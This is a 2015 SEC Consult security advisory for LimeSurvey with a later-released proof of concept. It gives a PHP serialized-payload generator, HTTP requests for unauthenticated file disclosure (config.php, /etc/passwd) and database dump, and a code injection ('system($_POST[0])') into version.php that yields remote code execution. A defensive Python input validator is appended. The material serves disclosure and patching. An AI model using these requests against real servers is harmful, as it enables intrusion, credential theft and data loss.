SEC Consult Vulnerability Lab Security Advisory < 20151022-0 >
=======================================================================
title: Multiple critical vulnerabilities
product: Lime Survey
vulnerable version: 2.05 up to 2.06+ Build 151014
fixed version: 2.06+ Build 151016
CVE number:
impact: critical
homepage: www.limesurvey.org
found: 2015-10-12
by: P. Morimoto (Office Bangkok)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore
Vienna (HQ) - Vilnius - Zurich - Bangkok
=======================================================================
Vendor description:
-------------------
Lime Survey allows users to quickly create intuitive, powerful,
online question-and-answer surveys that can work for tens to thousands
of participants without much effort. The survey software itself is
self-guiding for the respondents who are participating.
Lime Survey has surpassed 1,500,000 downloads and is used by a huge number of
private persons, big companies, academic facilities and governmental
institutions around the world.
URL: www.limesurvey.org/en/about-limesurvey/references
Business recommendation:
------------------------
By combining the vulnerabilities documented in this advisory,
unauthenticated remote attackers can completely compromise the Lime
Survey application server.
- Arbitrary local files can be downloaded
- Entire Lime Survey database can be accessed
- Arbitrary PHP code can be executed
SEC Consult recommends not to use this software until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.
Vulnerability overview/description:
-----------------------------------
Due to the lack of function level access control many administrative
functions in Lime Survey can be accessed by remote attackers without
prior authentication.
Moreover, the application did not validate some user input properly.
Unauthenticated attackers can pass specially crafted data to these entry points,
resulting in the following vulnerabilities.
1. Unauthenticated local file disclosure
An attacker can craft a malicious PHP serialized string containing a list of
arbitrary files. This list can be sent to the Lime Survey backup feature
for downloading without prior authentication.
Any files accessible with the privileges of the web server user
can be downloaded.
2. Unauthenticated database dump
An attacker can request the database backup feature without authentication.
The whole Lime Survey database can be downloaded including username and
hashed password of the administrator account.
3. Unauthenticated arbitrary remote code execution
An attacker can inject arbitrary PHP code into the application source code,
allowing them to plant a malicious web backdoor and access the underlying web server.
4. Multiple reflective cross-site scripting
The application is prone to multiple reflective cross-site scripting
vulnerabilities.
Proof of concept:
-----------------
The vendor kindly asked SEC Consult to give people enough time to update
their installations.
Because of the high risk vulnerabilities, the proof of concept
section has been removed from this advisory.
Update 2016-09-29: PoC released, see below.
1. Unauthenticated local file disclosure
First, generate the list of files for the PHP serialized payload.
$ cat limesurvey-lfi.php
<?php
$pwn = new stdClass; // dummy class
$pwn->file = '/application/config/config.php';
$pwn2 = new stdClass;
$pwn2->file = '/../../../../../../../../../etc/passwd';
echo base64_encode(serialize([$pwn, $pwn2])); // datasupdateinfo
Then submit the generated value in an unauthenticated request with the datasupdateinfo parameter.
HTTP Request:
POST /index.php/admin/update/backup HTTP/1.1
Host: <host>
[..deducted..]
Cookie: YII_CSRF_TOKEN=x;
Content-Type: application/x-www-form-urlencoded
Content-Length: 264
YII_CSRF_TOKEN=x&destinationBuild=x&datasupdateinfo=YToyOntpOjA7Tzo4OiJzdGRDbGFzcyI6MTp7czo0OiJmaWxlIjtzOjMwOiIvYXBwbGljYXRpb24vY29uZmlnL2NvbmZpZy5waHAiO31pOjE7Tzo4OiJzdGRDbGFzcyI6MTp7czo0OiJmaWxlIjtzOjM4OiIvLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCI7fX0=
HTTP Response:
HTTP/1.1 200 OK
Date: Mon, 12 Oct 2015 19:37:27 GMT
Set-Cookie: PHPSESSID=4fr25208e91ap3ith6beagg9l3; path=/; HttpOnly
[..deducted..]
<h2 class="maintitle">Creating file backup</h2>
<div class="updater-background">
<p class="success " style="text-align: left;">
<strong>File backup created: </strong>
<br/>
/var/www/limesurvey/tmp/LimeSurvey_files_backup_2015-10-12_040d1150297f7ae0f46c338a80114a3c.zip<br/>
<a class="btn btn-success" href="http://<host>/tmp/LimeSurvey_files_backup_2015-10-12_040d1150297f7ae0f46c338a80114a3c.zip" title="Download this file">Download this file</a>
[..deducted..]
$ unzip -l LimeSurvey_files_backup_2015-10-12_040d1150297f7ae0f46c338a80114a3c.zip
Archive: LimeSurvey_files_backup_2015-10-12_040d1150297f7ae0f46c338a80114a3c.zip
Length Date Time Name
-------- ---- ---- ----
2345 10-12-15 13:33 application/config/config.php
1148 10-12-15 13:22 ../../../../../../../../../etc/passwd
-------- -------
3493 2 files
2. Unauthenticated database dump
HTTP Request:
POST /index.php/admin/update/step3 HTTP/1.1
Host: <host>
[..deducted..]
Cookie: YII_CSRF_TOKEN=x;
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
YII_CSRF_TOKEN=x
HTTP Response:
HTTP/1.1 200 OK
[..deducted..]
<div class="successtitle"> Creating database backup...</div>
<p class="success">DB backup created: /var/www/limesurvey/tmp/LimeSurvey_database_backup_2015-10-16_00763f2a6579925ae1daf39239e7aa1b.zip</p>
[..deducted..]
The entire Lime Survey database is downloadable via
http://<host>/tmp/LimeSurvey_database_backup_2015-10-16_00763f2a6579925ae1daf39239e7aa1b.zip
3. Unauthenticated arbitrary remote code execution
HTTP Request:
POST /index.php/admin/update/step4 HTTP/1.1
Host: <host>
[..deducted..]
Cookie: YII_CSRF_TOKEN=x;
Content-Type: application/x-www-form-urlencoded
YII_CSRF_TOKEN=x&destinationBuild=151014';system($_POST[0]);phpinfo();//&datasupdateinfo=YToxOntpOjA7Tzo4OiJzdGRDbGFzcyI6MTp7czo0OiJmaWxlIjtzOjMwOiIvYXBwbGljYXRpb24vY29uZmlnL2NvbmZpZy5waHAiO319&access_token=<ComfortUpdate_Token>
The ComfortUpdate server appears to cast the parameter to an integer, i.e. (int) "151014';system($_POST[0]);phpinfo();//&" => 151014, and returns a valid .zip update,
but the local update routine writes the raw user-supplied string $destinationBuild => "151014';system($_POST[0]);phpinfo();//&" into version.php.
Next, request any page, for example the homepage of Lime Survey.
The injected "phpinfo()" is executed, completing the unauthenticated RCE exploit,
because "version.php" is automatically included on almost every page.
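Server-side input checks that address the root causes of issues 1 and 3 above, written as an added example and not taken from LimeSurvey's code: the datasupdateinfo value is decoded and each listed file is rejected unless it resolves below the install root, and destinationBuild is rejected unless it is digits only. The install root /var/www/limesurvey and the sample payload are taken from the PoC; the function names are hypothetical.

```python
import base64
import posixpath
# Constructed sample: the serialised file list the PoC's PHP helper produces, rebuilt here so the example runs offline.
SAMPLE_LIST = ('a:2:{i:0;O:8:"stdClass":1:{s:4:"file";s:30:"/application/config/config.php";}'
               'i:1;O:8:"stdClass":1:{s:4:"file";s:38:"/../../../../../../../../../etc/passwd";}}')
SAMPLE_DATASUPDATEINFO = base64.b64encode(SAMPLE_LIST.encode()).decode()
APP_ROOT = "/var/www/limesurvey"  # assumed install root, taken from the backup paths in the PoC response

def php_unserialize(data):
    """Minimal PHP unserialize() for ints, strings, arrays and objects (objects become dicts with '__class')."""
    def parse(pos):
        kind = data[pos]
        if kind == "i":
            end = data.index(";", pos)
            return int(data[pos + 2:end]), end + 1
        if kind == "s":
            colon = data.index(":", pos + 2)
            start, length = colon + 2, int(data[pos + 2:colon])  # skip ':"'
            return data[start:start + length], start + length + 2  # skip '";'
        if kind in "aO":
            pos, result = pos + 2, {}
            if kind == "O":
                colon = data.index(":", pos)
                name_len = int(data[pos:colon])
                result["__class"] = data[colon + 2:colon + 2 + name_len]
                pos = colon + 2 + name_len + 2  # skip '"name":'
            colon = data.index(":", pos)
            count, pos = int(data[pos:colon]), colon + 2  # skip ':{'
            for _ in range(count):
                key, pos = parse(pos)
                result[key], pos = parse(pos)
            return result, pos + 1  # skip '}'
        raise ValueError("unsupported serialised type %r at %d" % (kind, pos))
    return parse(0)[0]

def validate_backup_list(encoded, root=APP_ROOT):
    """Split a datasupdateinfo value into paths that stay under root and paths that escape it."""
    entries = php_unserialize(base64.b64decode(encoded).decode())
    allowed, rejected = [], []
    for entry in entries.values():
        # Normalise the path first, so '..' segments cannot walk out of the install root.
        resolved = posixpath.normpath(posixpath.join(root, entry["file"].lstrip("/")))
        if entry.get("__class") == "stdClass" and resolved.startswith(root + "/"):
            allowed.append(resolved)
        else:
            rejected.append(entry["file"])
    return allowed, rejected

def valid_build_number(value):
    """destinationBuild must be ASCII digits only before it is written into version.php."""
    return value.isascii() and value.isdigit()
```

These checks complement the missing authentication on the /admin/update/ actions rather than replace it; in the PHP application the equivalent fix also means never calling unserialize() on client-supplied data.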
4. Multiple reflective cross-site scripting
File: application/views/admin/update/_ajaxVariables.php:23:
File: application/views/admin/update/_ajaxVariables.php:30:
File: application/views/admin/update/_ajaxVariables.php:34: